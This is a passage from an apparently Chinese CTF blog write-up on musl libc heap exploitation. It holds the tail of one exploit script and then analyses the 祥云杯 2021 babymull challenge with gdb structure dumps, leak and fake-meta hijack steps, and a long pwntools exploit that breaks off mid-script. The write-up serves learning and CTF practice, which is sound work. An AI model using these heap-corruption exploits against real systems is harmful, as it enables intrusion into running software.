sh.recvuntil(s)</span><br><span class="line">ti = <span class="keyword">lambda</span> : sh.interactive()</span><br><span class="line">leak = <span class="keyword">lambda</span> name,addr :log.success(name+<span class="string">":"</span>+<span class="built_in">hex</span>(addr))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">menu</span>(<span class="params">choice</span>):</span></span><br><span class="line"> sla(<span class="string">"> "</span>,<span class="built_in">str</span>(choice))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">size,believer,content</span>):</span></span><br><span class="line"> menu(<span class="number">1</span>)</span><br><span class="line"> sla(<span class="string">'size? >'</span>,<span class="built_in">str</span>(size))</span><br><span class="line"> sla(<span class="string">'believer? >'</span>,<span class="built_in">str</span>(believer)) <span class="comment">#Y</span></span><br><span class="line"> sa(<span class="string">'sleeve >'</span>,content)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">idx,content</span>):</span></span><br><span class="line"> menu(<span class="number">3</span>)</span><br><span class="line"> sla(<span class="string">"sleeve ID? >"</span>,<span class="built_in">str</span>(idx))</span><br><span class="line"> sl(content)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">idx</span>):</span></span><br><span class="line"> menu(<span class="number">4</span>)</span><br><span class="line"> sla(<span class="string">"sleeve ID? >"</span>,<span class="built_in">str</span>(idx))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span>(<span class="params">idx</span>):</span></span><br><span class="line"> menu(<span class="number">2</span>)</span><br><span class="line"> sla(<span class="string">"sleeve ID? >"</span>,<span class="built_in">str</span>(idx))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">death</span>():</span></span><br><span class="line"> menu(<span class="number">5</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># ========================================================leak libc</span></span><br><span class="line">add(<span class="number">0x30</span>,<span class="string">'N'</span>,<span class="string">'a'</span>*<span class="number">0x30</span>) <span class="comment">#0</span></span><br><span class="line">add(<span class="number">0x30</span>,<span class="string">'N'</span>,<span class="string">'a'</span>*<span class="number">0x30</span>) <span class="comment">#1 avoid consolidation</span></span><br><span class="line">add(<span class="number">0x30</span>,<span class="string">'N'</span>,<span class="string">'b'</span>*<span class="number">0x30</span>) <span class="comment">#3</span></span><br><span class="line">add(<span class="number">0x30</span>,<span class="string">'N'</span>,<span class="string">'c'</span>*<span class="number">0x30</span>) <span class="comment">#4</span></span><br><span class="line">add(<span class="number">0x30</span>,<span class="string">'N'</span>,<span class="string">'a'</span>*<span class="number">0x30</span>) <span class="comment">#5 avoid consolidation</span></span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">add(<span class="number">8</span>,<span class="string">'N'</span>,<span class="string">'b'</span>*<span class="number">8</span>) <span class="comment">#0</span></span><br><span class="line">show(<span class="number">0</span>)</span><br><span class="line">mal = u64(sh.recvuntil(<span class="string">'\x7f'</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">'\x00'</span>)) - <span class="number">24</span></span><br><span class="line">leak(<span class="string">'mal'</span>,mal)</span><br><span class="line">libc = ELF(<span class="string">'./libc.so'</span>)</span><br><span class="line">libc.address = mal - <span class="number">0x292ac0</span></span><br><span class="line">leak(<span class="string">'libc.address'</span>,libc.address)</span><br><span class="line"></span><br><span class="line"><span class="comment"># =========================================================hijack bin</span></span><br><span class="line">delete(<span class="number">4</span>)</span><br><span class="line"><span class="comment"># overflow chunk4(in bin)</span></span><br><span class="line">delete(<span class="number">3</span>)</span><br><span class="line">add(<span class="number">0x30</span>,<span class="string">'Y'</span>,<span class="string">'d'</span>*<span class="number">0x30</span>+p64(<span class="number">0x41</span>)+p64(<span class="number">0xb40</span>)+p64(mal+<span class="number">880</span>)+p64(libc.sym[<span class="string">'__stdin_FILE'</span>]+<span class="number">0x40</span>)+<span class="string">'\n'</span>) <span class="comment">#3</span></span><br><span class="line"><span class="comment"># insert bin</span></span><br><span class="line">add(<span class="number">0x30</span>,<span class="string">'N'</span>,<span class="string">'e'</span>*<span class="number">0x30</span>) <span class="comment">#4</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x80</span>,<span class="string">'N'</span>,<span class="string">'g'</span>*<span class="number">0x30</span>) <span class="comment">#5 write stdin!</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># gdb.attach(sh)</span></span><br><span class="line">ti()</span><br></pre></td></tr></table></figure><hr><h1 id="Version-1-2-2"><a href="#Version-1-2-2" class="headerlink" title="Version 1.2.2"></a>Version 1.2.2</h1><h2 id="祥云杯-2021-babymull"><a href="#祥云杯-2021-babymull" class="headerlink" title="祥云杯_2021_babymull"></a><strong>祥云杯_2021_babymull</strong></h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash">./libc.so</span> </span><br><span class="line">musl libc (x86_64)</span><br><span class="line">Version 1.2.2</span><br><span class="line">Dynamic Program Loader</span><br></pre></td></tr></table></figure><p><a href="http://pzhxbz.cn/?p=172">新版musl libc 浅析</a></p><p><a href="https://blog.csdn.net/easy_level1/article/details/118606424">[阅读型]新版musl libc(1.2.2)堆管理之源码剖析!</a></p><p><a href="https://www.anquanke.com/post/id/241101#h2-5">借助DefCon Quals 2021的mooosl学习musl mallocng(源码审计篇)</a></p><p>本题exp参考 <a href="https://mp.weixin.qq.com/s/UwrZVlQ_WJ5rO4InOErt1g">第二届“祥云杯”网络安全大赛官方Writeup-Pwn篇</a> </p><h3 id="静态分析-1"><a href="#静态分析-1" class="headerlink" title="静态分析"></a><strong>静态分析</strong></h3><p>禁用了execve</p><p>只能在add写chunk</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">manage_chunk</span>{</span> # <span class="number">0x20</span></span><br><span class="line"><span class="keyword">char</span> name[<span class="number">0x10</span>];</span><br><span class="line"><span class="keyword">void</span> *chunk_ptr; # chunk_Size <= <span class="number">0x1000</span></span><br><span class="line"><span class="keyword">size_t</span> size;</span><br><span class="line">};</span><br></pre></td></tr></table></figure><p>chunk_ptr指针free后没置0</p><p>有一次show机会</p><p>一次后门:将任意一地址的单字节置零,然后泄露任意一地址的 8 字节。</p><p><img src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/image-20210912182016284.png" alt="image-20210912182016284"></p><h3 id="gdb查看数据结构"><a href="#gdb查看数据结构" class="headerlink" title="gdb查看数据结构"></a><strong>gdb查看数据结构</strong></h3><p>对着下图从头开始一个个分析结构</p><p><img src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/t015d8a64ff8626cf0d.png" alt="img"></p><h4 id="malloc-context"><a href="#malloc-context" class="headerlink" title="__malloc_context"></a><strong>__malloc_context</strong></h4><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">pwndbg> p __malloc_context</span><br><span class="line"><span class="variable">$1</span> = {</span><br><span class="line"> secret = <span class="number">13395722478044406582</span>, </span><br><span class="line"> init_done = <span class="number">1</span>, </span><br><span class="line"> mmap_counter = <span class="number">0</span>, </span><br><span class="line"> free_meta_head = <span class="number">0</span>x0, </span><br><span class="line"> avail_meta = <span class="number">0</span>x5555560cc1f8, <span class="comment">#meta_area中管理的空闲的meta首地址,用avail_meta_count表示数量</span></span><br><span class="line"> avail_meta_count = <span class="number">89</span>, </span><br><span class="line"> avail_meta_area_count = <span class="number">0</span>, </span><br><span class="line"> meta_alloc_shift = <span class="number">0</span>, </span><br><span class="line"> meta_area_head = <span class="number">0</span>x5555560cc000, </span><br><span class="line"> meta_area_tail = <span class="number">0</span>x5555560cc000, </span><br><span class="line"> avail_meta_areas = <span class="number">0</span>x5555560cd000 <error: Cannot access memory at address <span class="number">0</span>x5555560cd000>, </span><br><span class="line"> active = {<span class="number">0</span>x0 <repeats <span class="number">11</span> times>, <span class="number">0</span>x5555560cc090, <span class="number">0</span>x0, <span class="number">0</span>x0, <span class="number">0</span>x0, <span class="number">0</span>x5555560cc068, <span class="number">0</span>x0, <span class="number">0</span>x0, <span class="number">0</span>x0, <span class="number">0</span>x5555560cc040, <span class="number">0</span>x0, <span class="number">0</span>x0, <span class="number">0</span>x0, <span class="number">0</span>x5555560cc018, <span class="number">0</span>x0 <repeats <span class="number">24</span> times>}, </span><br><span class="line"> <span class="comment"># 堆管理器依据申请的size,将chunk分成48类chunk。缓存可继续分配的meta,数组下标与大小有关。</span></span><br><span class="line"> usage_by_class = {<span class="number">0</span> <repeats <span class="number">48</span> times>}, <span class="comment"># 对应大小的缓存的所有meta的group所管理的chunk个数。</span></span><br><span class="line"> unmap_seq = <span class="string">'\000'</span> <repeats <span class="number">31</span> times>, </span><br><span class="line"> bounces = <span class="string">'\000'</span> <repeats <span class="number">31</span> times>, </span><br><span class="line"> seq = <span class="number">0</span> <span class="string">'\000'</span>, </span><br><span class="line"> brk = <span class="number">93825004261376</span></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">pwndbg> p &__malloc_context</span><br><span class="line"><span class="variable">$2</span> = (struct malloc_context *) <span class="number">0</span>x7f952e19cb60 <__malloc_context></span><br><span class="line"></span><br><span class="line">pwndbg> vmmap</span><br><span class="line">LEGEND: STACK | HEAP | CODE | <span class="keyword">DATA</span> | RWX | RODATA</span><br><span class="line">......</span><br><span class="line"> <span class="number">0</span>x7f952e19c000 <span class="number">0</span>x7f952e19d000 rw<span class="literal">-p</span> <span class="number">1000</span> <span class="number">98000</span> /home/wendy/Desktop/xyb/babymull/libc.so</span><br><span class="line">......</span><br><span class="line"></span><br></pre></td></tr></table></figure><p><code>__malloc_context</code>是musl libc的全局管理结构指针,相当于main_arena,存放在libc.so的bss段</p><p><code>active = {0x0 <repeats 11 times>, 0x5555560cc090,0...</code>:堆管理器依据申请的size,将chunk分成48类chunk,由sizeclass指定。每类chunk由一个meta结构管理,meta管理的chunk个数有限,由<code>small_cnt_tab</code>指定。当申请个数超出一个meta所能管理的最大数量,堆管理器会再申请同类型meta管理更多的chunk,并且以双向链表结构管理这些相同类型的meta。<br><code>usage_by_class = {0 <repeats 48 times>}</code>:表示当前各meta管理着的chunk个数。</p><h4 id="申请-chunk后的malloc-context变化"><a href="#申请-chunk后的malloc-context变化" class="headerlink" title="申请 chunk后的malloc_context变化"></a><strong>申请 chunk后的malloc_context变化</strong></h4><p>这里直接用这题做测试,add 0x20两次,相当于申请了4个0x30的chunk</p><p>用户申请空间之后,才有了meta页来对chunk进行管理</p><p>同时malloc_context的active数组对应元素会指向meta地址</p><p>usage_by_class数组会显示该meta的每group可管理chunk的最多数量</p><p><img src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/%E6%97%A0%E6%A0%87%E9%A2%98.png" alt="无标题"></p><h4 id="meta结构体"><a href="#meta结构体" class="headerlink" title="meta结构体"></a><strong>meta结构体</strong></h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">meta</span> {</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">meta</span> *<span class="title">prev</span>, *<span class="title">next</span>;</span> <span class="comment">// meta是一个双向链表</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">group</span> *<span class="title">mem</span>;</span></span><br><span class="line"> <span class="keyword">volatile</span> <span class="keyword">int</span> avail_mask, freed_mask;</span><br><span class="line"> <span class="keyword">uintptr_t</span> last_idx:<span class="number">5</span>;</span><br><span class="line"> <span class="keyword">uintptr_t</span> freeable:<span class="number">1</span>;</span><br><span class="line"> <span class="keyword">uintptr_t</span> sizeclass:<span class="number">6</span>;</span><br><span class="line"> <span class="keyword">uintptr_t</span> maplen:<span class="number">8</span>*<span class="keyword">sizeof</span>(<span class="keyword">uintptr_t</span>)<span class="number">-12</span>;</span><br><span class="line">};</span><br></pre></td></tr></table></figure><p>申请4个chunk之后gdb查看meta结构</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">add(<span class="number">0x20</span>, <span class="string">b"B"</span>*<span class="number">0x20</span>)</span><br><span class="line">add(<span class="number">0x20</span>, <span class="string">b"C"</span>*<span class="number">0x20</span>)</span><br></pre></td></tr></table></figure><p><img src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/image-20210912153822227.png" alt="image-20210912153822227"></p><p><img src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/image-20210912154050548.png" alt="image-20210912154050548"></p><blockquote><p><code>0x7fb8fbfa9ce0</code>是<code>user data</code>域;<br><code>avail_mask = 1008 = 0b11 1111 0000</code>表示第0、1、2、3个chunk不可用(已经被使用);<br><code>freed_mask = 0</code>表示没有chunk被释放;<br><code>last_idx = 9</code>表示最后一个chunk的下标是9,总数是10个<br><code>sizeclass = 2</code>表示由<code>2</code>这个group进行管理。</p></blockquote><p>当我们把2这个group里10个chunk都使用掉,之后申请就会开辟第二个meta页进行管理,两个meta之间由一个双向链表进行维护;</p><h4 id="group里的chunk结构"><a href="#group里的chunk结构" class="headerlink" title="group里的chunk结构"></a><strong>group里的chunk结构</strong></h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">struck chunk{</span><br><span class="line"> uint8 zero;</span><br><span class="line"> uint8 idx; <span class="comment">// 低7位是idx, 高5位是reserved</span></span><br><span class="line"> uint16 offset;</span><br><span class="line"> <span class="keyword">char</span>[] usermem; <span class="comment">// <--用户拿到的内存</span></span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>由上图meta结构中的mem指针查看<code>user data</code>域</p><p><img src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/image-20210912160425927.png" alt="image-20210912160425927"></p><p>需要注意,分配给用户的 最小chunk size 是0x8</p><p>和glibc类似,可以进行<strong>复用</strong>,可以接收输入<code>8+4</code>个byte,<strong>占用下一个chunk header的前4个byte</strong></p><h4 id="释放-chunk之后meta结构变化"><a href="#释放-chunk之后meta结构变化" class="headerlink" title="释放 chunk之后meta结构变化"></a><strong>释放 chunk之后meta结构变化</strong></h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">add(<span class="number">0x20</span>, b<span class="string">"B"</span>*<span class="number">0x20</span>)</span><br><span class="line">add(<span class="number">0x20</span>, b<span class="string">"C"</span>*<span class="number">0x20</span>)</span><br><span class="line"><span class="keyword">delete</span>(<span class="number">0</span>)</span><br></pre></td></tr></table></figure><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">pwndbg> p *(struct meta*)<span class="number">0</span>x55555688b1f8</span><br><span class="line"><span class="variable">$2</span> = {</span><br><span class="line"> prev = <span class="number">0</span>x55555688b1f8, </span><br><span class="line"> next = <span class="number">0</span>x55555688b1f8, </span><br><span class="line"> mem = <span class="number">0</span>x7f9d4c0fbce0, </span><br><span class="line"> avail_mask = <span class="number">1008</span>, </span><br><span class="line"> freed_mask = <span class="number">3</span>, </span><br><span class="line"> last_idx = <span class="number">9</span>, </span><br><span class="line"> freeable = <span class="number">1</span>, </span><br><span class="line"> sizeclass = <span class="number">2</span>, </span><br><span class="line"> maplen = <span class="number">0</span></span><br><span class="line">}</span><br></pre></td></tr></table></figure><p><code>freed_mask = 3 = 0b11</code>表示前两个chunk被释放;<br><code>avail_mask = 1008 = 0b11 1111 0000</code>可以发现,avail_mask没变,此时前两个chunk仍然为不可分配的状态;</p><p>chunk header</p><p><img src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/image-20210912163514516.png" alt="image-20210912163514516"></p><p>上面了解得差不多了,应该就可以看懂exp了</p><p>开始复现</p><h3 id="how-to-leak-1"><a href="#how-to-leak-1" class="headerlink" title="how to leak"></a><strong>how to leak</strong></h3><p>manage chunk里面就有slot指针(其实就是chunk,但是好像在musl里面叫slot),但是前面的name有截断符,泄露不了</p><p>当一个group的所有chunk都被使用过了 ,才会使用被释放的chunk,</p><p>那么我们先申请完10个chunk,并填满数据,再释放上图前两个框的chunk,</p><p>再申请两个size不等于0x20的content_chunk,则第二个content_chunk的manage_chunk就是上图第二个框的chunk,</p><p>name的截断符就没有了,这样show功能可以直接泄露后面的指针域</p><p><img src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/image-20210912170553923.png" alt="image-20210912170553923"></p><h3 id="how-to-hijack-1"><a href="#how-to-hijack-1" class="headerlink" title="how to hijack"></a><strong>how to hijack</strong></h3><p>dele content_chunk5时</p><p>会根据content_chunk5的head中的offset定位到存放meta地址的地址</p><p>offset被我们用后门函数改为了0x1000</p><p>所以就定位到了chunk0内已经写好的fake meta地址</p><p>这样fake meta就被链到了active里</p><p><img src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/image-20210912223251244.png" alt="image-20210912223251244"></p><p><img src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/image-20210912223348499.png" alt="image-20210912223348499"></p><p><img src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/image-20210912223734296.png" alt="image-20210912223734296"></p><p>之后再edit chunk0 </p><p><img src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/image-20210913101355722.png" alt="image-20210913101355722"></p><p><img src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/image-20210913103019896.png" alt="image-20210913103019896"></p><p>这篇新空间刚好可以用来写orw_rop</p><p>之后申请0x800的chunk就刚好能申请到stdout_FILE</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: UTF-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">context.arch=<span class="string">'amd64'</span></span><br><span class="line"></span><br><span class="line">flag=<span class="number">0</span></span><br><span class="line"><span class="keyword">if</span> flag:</span><br><span class="line"> sh = remote(<span class="string">'119.3.81.43'</span>, <span class="number">49153</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line"> sh = process([<span class="string">"./libc.so"</span>,<span class="string">"./babymull"</span>])</span><br><span class="line">sa = <span class="keyword">lambda</span> s,n : sh.sendafter(s,n)</span><br><span class="line">sla = <span class="keyword">lambda</span> s,n : sh.sendlineafter(s,n)</span><br><span class="line">sl = <span class="keyword">lambda</span> s : sh.sendline(s)</span><br><span class="line">sd = <span class="keyword">lambda</span> s : sh.send(s)</span><br><span class="line">rc = <span class="keyword">lambda</span> n : sh.recv(n)</span><br><span class="line">ru = <span class="keyword">lambda</span> s : sh.recvuntil(s)</span><br><span class="line">ti = <span class="keyword">lambda</span> : sh.interactive()</span><br><span class="line">leak = <span class="keyword">lambda</span> name,addr :log.success(name+<span class="string">":"</span>+<span class="built_in">hex</span>(addr))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">menu</span>(<span class="params">choice</span>):</span></span><br><span class="line"> sla(<span class="string">"choice >> "</span>,<span class="built_in">str</span>(choice))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">Size,content=<span class="string">'A'</span>, name=<span class="string">b"A"</span>*<span class="number">0xf</span></span>):</span></span><br><span class="line"> menu(<span class="number">1</span>)</span><br><span class="line"> sa(<span class="string">'Name: '</span>,name)</span><br><span class="line"> sla(<span class="string">'Size: '</span>,<span class="built_in">str</span>(Size))</span><br><span class="line"> sla(<span class="string">'Content: '</span>,content)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">idx</span>):</span></span><br><span class="line"> menu(<span class="number">3</span>)</span><br><span class="line"> sla(<span class="string">"Index: "</span>,<span class="built_in">str</span>(idx))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span>(<span class="params">idx</span>):</span></span><br><span class="line"> menu(<span class="number">2</span>)</span><br><span class="line"> sla(<span class="string">"Index: "</span>,<span class="built_in">str</span>(idx))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">gift</span>(<span class="params">set_zero,leak_addr</span>):</span></span><br><span class="line"> menu(<span class="number">0x73317331</span>)</span><br><span class="line"> sl(<span class="built_in">str</span>(set_zero))</span><br><span class="line"> sl(<span class="built_in">str</span>(leak_addr))</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">5</span>):</span><br><span class="line"> add(<span class="number">0x20</span>, <span class="string">b"B"</span>*<span class="number">0x20</span>) <span class="comment"># fill group2</span></span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">0x1000</span>) <span class="comment"># 0 use manage_chunk0</span></span><br><span class="line">add(<span class="number">0x1000</span>, <span class="string">'\x00'</span>*<span class="number">0x238</span> + p32(<span class="number">0x5</span>)) <span class="comment"># 5 use content_chunk0 why p32(0x5)????</span></span><br><span class="line"><span class="comment"># # fake reserved_size</span></span><br><span class="line"></span><br><span class="line"><span class="comment">### Leak libc address</span></span><br><span class="line">show(<span class="number">5</span>)</span><br><span class="line">libc=ELF(<span class="string">'./libc.so'</span>,checksec=<span class="literal">False</span>)</span><br><span class="line">libc.address = u64(sh.recvuntil(<span class="string">'\x7f'</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">'\x00'</span>)) + <span class="number">0x2aa0</span> +<span class="number">0x6000</span></span><br><span class="line">leak(<span class="string">'libc.address'</span>,libc.address)</span><br><span class="line">mmap_base = libc.address - <span class="number">0xa000</span> </span><br><span class="line">leak(<span class="string">'mmap_base'</span>,mmap_base)</span><br><span class="line">leak(<span class="string">'mmap_base + 0x1560 -8 + 6'</span>,mmap_base + <span class="number">0x1560</span> -<span class="number">8</span> + <span class="number">6</span>)</span><br><span class="line">leak(<span class="string">'malloc_context'</span>,libc.symbols[<span class="string">'__malloc_context'</span>])</span><br><span class="line"></span><br><span class="line"><span class="comment"># modify head of content_chunk_5 // offset 0x1550->0x1000</span></span><br><span class="line"><span class="comment"># leak __malloc_context->secrect</span></span><br><span class="line">gift(mmap_base + <span class="number">0x1560</span> -<span class="number">8</span> + <span class="number">6</span> ,libc.symbols[<span class="string">'__malloc_context'</span>])</span><br><span class="line">sh.recvuntil(<span class="string">'0x'</span>)</span><br><span class="line">secret = <span class="built_in">int</span>(sh.recvuntil(<span class="string">'\n'</span>,drop=<span class="literal">True</span>),<span class="number">16</span>)</span><br><span class="line">leak(<span class="string">'secret'</span>,secret)</span><br><span class="line"></span><br><span class="line"><span class="comment"># ======================================================================================</span></span><br><span class="line"></span><br><span class="line"><span class="comment">### Construct fake_meta and fake_meta_arena</span></span><br><span class="line">fake_meta = mmap_base+<span class="number">0x1000</span>+<span class="number">8</span></span><br><span class="line">fake_meta_ptr = mmap_base+<span class="number">0x550</span></span><br><span class="line"><span class="comment"># fake_meta_ptr</span></span><br><span class="line">pp = flat({<span class="number">0x550</span>-<span class="number">0x30</span>: fake_meta}, filler=<span class="string">'\x00'</span>, length=<span class="number">0x1000</span>-<span class="number">0x30</span>) </span><br><span class="line"><span class="comment"># fake meta_arena</span></span><br><span class="line">pp += p64(secret) <span class="comment"># area->check</span></span><br><span class="line"><span class="comment"># fake meta</span></span><br><span class="line">pp += flat([<span class="number">0</span>, <span class="number">0</span>, <span class="comment"># meta->prev, meta->next</span></span><br><span class="line"> fake_meta_ptr, <span class="comment"># meta->mem</span></span><br><span class="line"> <span class="number">0</span>, <span class="comment"># meta->avail_mask, meta->freed_mask</span></span><br><span class="line"> (<span class="number">24</span><<<span class="number">6</span>)+<span class="number">1</span> <span class="comment"># meta->sizeclass, meta->last_idx </span></span><br><span class="line"> ])</span><br><span class="line">leak(<span class="string">'fake_meta'</span>,fake_meta)</span><br><span class="line">leak(<span class="string">'fake_meta_ptr'</span>,fake_meta_ptr)</span><br><span class="line"><span class="comment">#edit chunk0</span></span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">add(<span class="number">0x1000</span>,pp) <span class="comment"># write fake meta to chunk0</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># insert fake meta</span></span><br><span class="line">delete(<span class="number">5</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#edit chunk0(fake meta->mem to __stdout_FILE) // uaf bin attack</span></span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">add(<span class="number">0x1000</span>, <span class="string">'\x00'</span>*(<span class="number">0x1000</span>-<span class="number">0x40</span>+<span class="number">8</span>) + flat([<span class="number">0</span>, <span class="number">0</span>, libc.symbols[<span class="string">"__stdout_FILE"</span>]-<span class="number">0x940</span>, <span class="number">2</span>, (<span class="number">24</span><<<span class="number">6</span>)+<span class="number">1</span>]))</span><br><span class="line"></span><br><span class="line"><span class="comment"># =====================================================================================</span></span><br><span class="line"></span><br><span class="line"><span class="comment">### Build orw ROP</span></span><br><span 